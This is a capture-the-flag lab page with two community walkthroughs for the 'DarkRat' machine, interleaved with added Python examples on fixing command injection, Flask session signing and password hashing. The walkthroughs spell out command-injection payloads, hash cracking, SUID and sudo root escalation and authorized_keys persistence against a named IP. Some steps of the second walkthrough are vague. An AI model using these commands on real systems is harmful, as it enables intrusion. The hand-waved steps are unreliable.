
DarkRat

Premium Machine (Locked)

r4tking built his own private operations platform — implant registry, remote probe, operator management. He thought it was locked down. Find the cracks, chain them together, and own the machine from web panel to root shell. Nothing here is accidental.



Community Walkthroughs

00x003 MOD A 19 May 2026

Walkthrough: DarkRat

Challenge Description

A poorly secured internal operations platform exposes sensitive APIs and vulnerable administrative functionality. Enumerate the application, abuse exposed exports, gain command execution, and escalate privileges to root.


1. Enumeration

Start with an Nmap scan against the target.

nmap -sV -p 30570,30571 45.79.202.95

Results

30570/tcp open  ssh     OpenSSH 9.2p1 Debian 12
30571/tcp open  http    Werkzeug httpd 3.1.8 (Python 3.11.2)

The web application appears to be a Flask/Werkzeug application named RatOps.


2. Web Enumeration

Retrieve the homepage:

curl -i http://45.79.202.95:30571

Interesting comment discovered:

<!-- TODO: remove /api/debug before any public-facing deploy -->

Enumerate additional endpoints:

ffuf -u http://45.79.202.95:30571/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc all -fc 404

Discovered endpoints:

/dashboard
/login
/logout
/robots.txt

Enumerate API endpoints:

ffuf -u http://45.79.202.95:30571/api/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc all -fc 404

Discovered:

/api/debug
/api/export
/api/health

3. Sensitive Data Exposure

The robots.txt file discloses hidden endpoints:

curl http://45.79.202.95:30571/robots.txt

Output:

User-agent: *
Disallow: /api/debug
Disallow: /api/export
Disallow: /admin/

Access the export endpoint directly:

curl http://45.79.202.95:30571/api/export?format=json

Response:

{
  "count":2,
  "users":[
    {
      "id":1,
      "password":"d23bb......4b7ae89",
      "role":"admin",
      "username":"r4tking"
    },
    {
      "id":2,
      "password":"64438e........a265e",
      "role":"user",
      "username":"devbot"
    }
  ]
}

4. Password Cracking

Save the hashes:

cat > hashes.txt << EOF
d23b...........b024b7ae89
64438......2de796b0ca265e
EOF

Crack using John the Ripper:

john hashes.txt \
--wordlist=/usr/share/wordlists/rockyou.txt \
--format=Raw-SHA1

Recovered password:

c.......3

5. Authentication

Login using the recovered credentials:

curl -i -X POST http://45.79.202.95:30571/login \
-d "username=devbot&password=c.....3"

The response includes a Flask session cookie:

Set-Cookie: session=...

Decode the session:

flask-unsign --decode --cookie '<COOKIE>'

Result:

{
  "role":"user",
  "username":"devbot"
}

6. Dashboard Access

Use the session cookie to access the dashboard:

curl -s \
-b "session=<COOKIE>" \
http://45.79.202.95:30571/dashboard

Additional administrative pages become accessible:

  • /admin/probe
  • /admin/operators
  • /admin/implants
  • /admin/logs

7. Command Injection Discovery

The /admin/probe endpoint performs network diagnostics.

Test command injection:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;id" \
http://45.79.202.95:30571/admin/probe

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

The target parameter is vulnerable to command injection.


8. System Enumeration

Identify the environment:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;whoami;id;pwd" \
http://45.79.202.95:30571/admin/probe

Result:

www-data
uid=33(www-data)
/

9. Privilege Escalation

Search for SUID binaries:

find / -perm -4000 2>/dev/null

A vulnerable SUID bash binary exists:

/tmp/rootbash

Exploit it:

/tmp/rootbash -p

Verify privileges:

/tmp/rootbash -p -c 'id'

Output:

uid=33(www-data) euid=0(root) gid=33(www-data)

Root access is achieved.


10. User Flag

Enumerate user directories:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;/tmp/rootbash -p -c 'ls -lah /home; find /home -type f 2>/dev/null | head -50'" \
http://45.79.202.95:30571/admin/probe

Discovered:

/home/r4tking/user.txt

Retrieve the flag:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;/tmp/rootbash -p -c 'cat /home/r4tking/user.txt'" \
http://45.79.202.95:30571/admin/probe

User Flag:

flag{...._...._...}

11. Root Access Persistence

Generate SSH host keys:

curl -s \
-b "session=<COOKIE>" \
-X POST \
--data-urlencode "target=127.0.0.1;/tmp/rootbash -p -c 'ssh-keygen -A && /usr/sbin/sshd'" \
http://45.79.202.95:30571/admin/probe

Add an SSH public key:

mkdir -p /root/.ssh
echo "<YOUR_PUBLIC_KEY>" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Although SSH authentication was unstable in the lab environment, root command execution through the vulnerable probe endpoint provided full control of the system.


Flags Collected

flag{...._...._...}

Key Takeaways

  1. Debug endpoints should never be exposed publicly.
  2. Sensitive exports containing password hashes can lead directly to compromise.
  3. Weak passwords remain one of the most common attack vectors.
  4. Command injection vulnerabilities are extremely dangerous in administrative tooling.
  5. SUID binaries must be audited carefully.
  6. Internal operations platforms often contain high-impact attack surfaces.
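The probe injection in step 7 comes from splicing the target parameter into a shell string. The following is an added example, not RatOps code, that reconstructs that pattern beside a hardened handler; the function names, the "target" parameter and the ping flags are assumptions for illustration. The injection payload "127.0.0.1;id" is the one shown in the write-up.

```python
"""Added example, not RatOps code: how a ping-style probe becomes
command-injectable, and a hardened handler. The function names, the
"target" parameter and the ping flags are assumptions for illustration.
"""
import ipaddress
import shlex
import shutil
import subprocess
from typing import Optional


def unsafe_probe_command(target: str) -> str:
    """The vulnerable pattern: request input spliced into a shell string
    that would be handed to subprocess.run(..., shell=True).

    "127.0.0.1;id" becomes "ping -c 1 127.0.0.1;id", which /bin/sh runs as
    two commands. Returned, not executed, so the example is safe to import.
    """
    return "ping -c 1 " + target


def quoted_probe_command(target: str) -> str:
    """A partial fix: shlex.quote neutralises shell metacharacters, but the
    value still reaches ping as one argument, so option injection ("-f",
    "-I ...") is not addressed and the shell is still in the path."""
    return "ping -c 1 " + shlex.quote(target)


def validate_target(target: str) -> Optional[str]:
    """Allow-list validation. Accept a literal IP address (normalised) or a
    conservative hostname; reject everything else, including anything that
    starts with "-" so it cannot be parsed as a ping option."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    ok_chars = all(ch.isalnum() or ch in ".-" for ch in target)
    if 0 < len(target) <= 253 and ok_chars and not target.startswith("-"):
        return target
    return None


def safe_probe(target: str, timeout: float = 5.0) -> Optional[str]:
    """Hardened handler: validated host, argv list (no shell), bounded
    runtime. Returns ping's stdout, or None when ping is not installed."""
    host = validate_target(target)
    if host is None:
        raise ValueError(f"rejected target: {target!r}")
    ping = shutil.which("ping")
    if ping is None:
        return None
    argv = [ping, "-c", "1", "-W", "2", host]  # no shell parses this
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout


if __name__ == "__main__":
    payload = "127.0.0.1;id"
    print("unsafe :", unsafe_probe_command(payload))
    print("quoted :", quoted_probe_command(payload))
    print("valid  :", validate_target(payload))
    try:
        safe_probe(payload)
    except ValueError as exc:
        print("safe   :", exc)
```

The allow-list is the control that matters: once the host is validated and passed as an argv element, neither shell metacharacters nor leading-dash options reach ping, and the process runs as whatever restricted account the panel uses rather than as an interactive shell.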
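Step 5 decodes the Flask session with flask-unsign. The point worth holding onto is that the cookie is signed, not encrypted: anyone holding it can read the role and username, but nobody without the SECRET_KEY can change them. The block below is an added example, not the page's or Flask's code. decode_session_payload() follows the real itsdangerous cookie layout; sign_demo()/verify_demo() are a simplified HMAC stand-in for itsdangerous signing, not Flask's exact key derivation, and the cookie value and secret are constructed here.

```python
"""Added example, not the page's or Flask's code: Flask session cookies are
signed, not encrypted. decode_session_payload() follows the real itsdangerous
layout; sign_demo()/verify_demo() are a simplified HMAC stand-in (assumption:
HMAC-SHA256 over payload.timestamp, no compression), not Flask's own scheme.
"""
import base64
import hashlib
import hmac
import json
import zlib


def _b64url_decode(segment: str) -> bytes:
    # itsdangerous strips base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_session_payload(cookie: str) -> dict:
    """Read the session dict from a Flask cookie without any key.
    Layout: [.]payload.timestamp.signature; a leading "." marks a
    zlib-compressed payload; every segment is unpadded base64url."""
    compressed = cookie.startswith(".")
    payload = cookie.lstrip(".").split(".")[0]
    raw = _b64url_decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def sign_demo(data: dict, secret: bytes, timestamp: str = "aaaaaa") -> str:
    """Simplified stand-in for itsdangerous signing: enough to show why a
    cookie edited by hand fails verification without the secret."""
    payload = _b64url_encode(json.dumps(data, separators=(",", ":")).encode())
    body = f"{payload}.{timestamp}"
    sig = hmac.new(secret, body.encode(), hashlib.sha256).digest()
    return f"{body}.{_b64url_encode(sig)}"


def verify_demo(cookie: str, secret: bytes) -> bool:
    """Constant-time check of the stand-in signature."""
    payload, timestamp, sig = cookie.split(".")
    body = f"{payload}.{timestamp}"
    expected = hmac.new(secret, body.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def forge_role(cookie: str, new_role: str) -> str:
    """What an attacker without the key can do: rewrite the payload and
    keep the old signature. The server must reject this."""
    payload, timestamp, sig = cookie.split(".")
    data = json.loads(_b64url_decode(payload))
    data["role"] = new_role
    forged = _b64url_encode(json.dumps(data, separators=(",", ":")).encode())
    return f"{forged}.{timestamp}.{sig}"


if __name__ == "__main__":
    secret = b"constructed-secret-key"  # constructed, not the target's key
    cookie = sign_demo({"role": "user", "username": "devbot"}, secret)
    print("decoded without key:", decode_session_payload(cookie))
    forged = forge_role(cookie, "admin")
    print("forged decodes as  :", decode_session_payload(forged))
    print("forged verifies    :", verify_demo(forged, secret))
```

Because the payload is readable, a session must never carry secrets, and because role lives in a client-held token, a weak or leaked SECRET_KEY (the thing flask-unsign's --unsign/--sign modes target) turns "role":"user" into "role":"admin" with no further vulnerability needed.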
mahnoor27 A 16 May 2026

1. Reconnaissance

Start with service enumeration:

nmap -sV -p 30570,30571 45.79.202.95

Result:
SSH → 30570 (OpenSSH 9.2p1 Debian)
HTTP → 30571 (Werkzeug / Flask 3.1.8)

Web application identified as:
RatOps v1.0.3 — internal operations platform

2. Web Enumeration

Browse to:

http://45.79.202.95:30571/

Find login panel for RatOps system.

Check robots.txt:

User-agent: *
Disallow: /api/debug
Disallow: /api/export
Disallow: /admin/

Key finding:
Hidden API endpoints exposed.

3. API Discovery

Access:

/api/debug

Result:
Leaked system metadata including:

  • application name
  • version
  • environment
  • Python runtime
  • internal note confirming debug endpoint exposure

This confirms sensitive debug interface exposed in production.

4. Authentication Bypass (API Export)

Endpoint:

/api/export

By default:
Returns → Unauthorized (403)

By modifying request:

format=json

Request:

http://45.79.202.95:30571/api/export?format=json

Result:
Authentication bypass triggered due to logic flaw.

Users database exposed including:

  • usernames
  • SHA1 password hashes
  • roles

5. Credential Extraction

Extracted users:

r4tking → admin role → SHA1 hash
devbot → user role → SHA1 hash

Example hashes (redacted conceptually):

r4tking → d23bb95c0082e567f8ce3c9de260d6b024b7ae89
devbot → 64438ee426438161da88554b3e2de796b0ca265e

6. Password Cracking

Use hashcat (SHA1 mode -m 100):

hashcat -m 100 hashes.txt rockyou.txt

Result:
devbot password → ******** (redacted)
r4tking password → ******** (redacted)

Key issue:
Weak passwords + no salting + SHA1 usage

7. Initial Web Access

Login to web panel using devbot credentials:

Username: devbot
Password: ********

Access granted to RatOps dashboard.

8. Command Injection (Network Probe)

Navigate:

Admin → Probe feature

Input field executes system ping command.

Payload test:

127.0.0.1; id

Result:
Command injection confirmed:

uid=33(www-data)

Impact:
Remote command execution as www-data

9. Local Enumeration via RCE

Enumerate system:

127.0.0.1; ls -la /opt/ratops

Find application structure:

  • app.py
  • db directory
  • config files
  • implants directory
  • .env file (restricted but readable via path traversal techniques)

10. Database Extraction

Extract SQLite database:

/opt/ratops/db/users.db

Contains:

  • users table
  • SHA1 password hashes
  • roles (admin/user)

Confirms same credentials as API leak.

11. Sensitive File Discovery

Enumerate filesystem:

find /opt/ratops -type f

Key findings:

/opt/ratops/.env → contains credentials
/opt/ratops/config/deploy.conf → deployment config
/opt/ratops/tools/deploy.sh → privileged script (root owned)
/opt/ratops/db/flag.txt → internal file (not final root flag)

12. Credential Harvesting (.env file)

Extract environment variables:

OPS_SSH_USER=r4tking
OPS_SSH_PASS=******** (redacted)

This reveals SSH access credentials for system user.

13. SSH Access

Login:

ssh r4tking@45.79.202.95 -p 30570

Enter password:
Result:
Shell access obtained as r4tking

14. User Flag

Check home directory:

cat user.txt

User-level compromise complete.

15. Privilege Escalation Enumeration

Check sudo permissions:

sudo -l

Result:

(root) NOPASSWD: /opt/ratops/tools/deploy.sh

Key observation:
Script runs as root without password.

16. Privilege Escalation Analysis

Inspect script:

  • Uses deploy.conf for source and destination
  • Executes rsync as root
  • No input sanitization or binary path hardening

Vulnerability type:
Insecure privileged script execution (sudo misconfiguration + environment reliance)

17. Root Privilege Escalation

Execute sudo script:

sudo /opt/ratops/tools/deploy.sh

Exploit class:
Privilege escalation via insecure root-executed deployment script (rsync-based execution context abuse)

Result:
Root shell obtained (direct or via command substitution / environment manipulation depending on setup)

18. Root Flag

After privilege escalation:

cd /root
cat root.txt

Root flag retrieved successfully.

Summary

Key Vulnerabilities

API logic flaw allowing authentication bypass
Sensitive data exposure via debug endpoint
Weak password hashing (SHA1 without salt)
Command injection in network probe feature
Sensitive file exposure via filesystem enumeration
Hardcoded credentials in .env file
Misconfigured sudo permission allowing root script execution

Attack Chain

Recon → API discovery → auth bypass → credential dump → hash cracking → web login → command injection → filesystem enumeration → credential harvesting → SSH access → sudo misconfiguration → root shell → root flag
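Both write-ups crack the exported hashes in seconds, and the second names the reason: unsalted SHA-1. The block below is an added example, not RatOps code, showing what a dictionary attack against unsalted SHA-1 looks like (the same operation john --format=Raw-SHA1 and hashcat -m 100 perform at scale), why identical hashes leak password reuse before any cracking, and what a salted, slow hash changes. The usernames come from the write-ups; the passwords, the wordlist and the third account are constructed, and the hash values are computed here rather than taken from the target.

```python
"""Added example, not RatOps code: dictionary attack against unsalted SHA-1
beside salted PBKDF2. The passwords, wordlist and "ops_ro" account are
constructed; the hashes are computed here, not the target's real hashes.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Iterable, List, Optional


def sha1_hex(password: str) -> str:
    """What the application stored: one unsalted SHA-1 per password."""
    return hashlib.sha1(password.encode()).hexdigest()


# Constructed stand-in for the /api/export leak.
LEAKED: Dict[str, str] = {
    "r4tking": sha1_hex("dragon"),
    "devbot": sha1_hex("summer2024"),
    "ops_ro": sha1_hex("summer2024"),  # constructed: reuses devbot's password
}

# Constructed wordlist standing in for rockyou.txt.
WORDLIST: List[str] = ["123456", "password", "dragon", "summer2024", "letmein"]


def crack_sha1(leaked: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Hash each candidate once and look it up against every leaked hash.
    With no salt, one pass over the wordlist attacks all users at once."""
    lookup = {sha1_hex(word): word for word in wordlist}
    return {user: lookup[h] for user, h in leaked.items() if h in lookup}


def duplicate_passwords(leaked: Dict[str, str]) -> Dict[str, List[str]]:
    """Unsalted hashes leak equality: same hash means same password, which
    identifies reuse across accounts without cracking anything."""
    by_hash: Dict[str, List[str]] = {}
    for user, h in leaked.items():
        by_hash.setdefault(h, []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                rounds: int = 600_000) -> str:
    """Salted, iterated hash. 600k rounds of PBKDF2-HMAC-SHA256 is the
    current OWASP guidance; the per-user salt defeats shared lookup tables."""
    salt = salt or secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("cracked   :", crack_sha1(LEAKED, WORDLIST))
    print("reuse     :", duplicate_passwords(LEAKED))
    a, b = pbkdf2_hash("summer2024"), pbkdf2_hash("summer2024")
    print("same pw, different stored values:", a != b)
    print("verify    :", pbkdf2_verify("summer2024", a))
```

Two things the example makes visible that the write-ups only state: every user falls to one pass over the wordlist because nothing per-user goes into the hash, and the two accounts sharing a password are linkable from the export alone. With a per-user salt the same password produces different stored values, so each account costs a separate attack, and the iteration count makes each guess expensive.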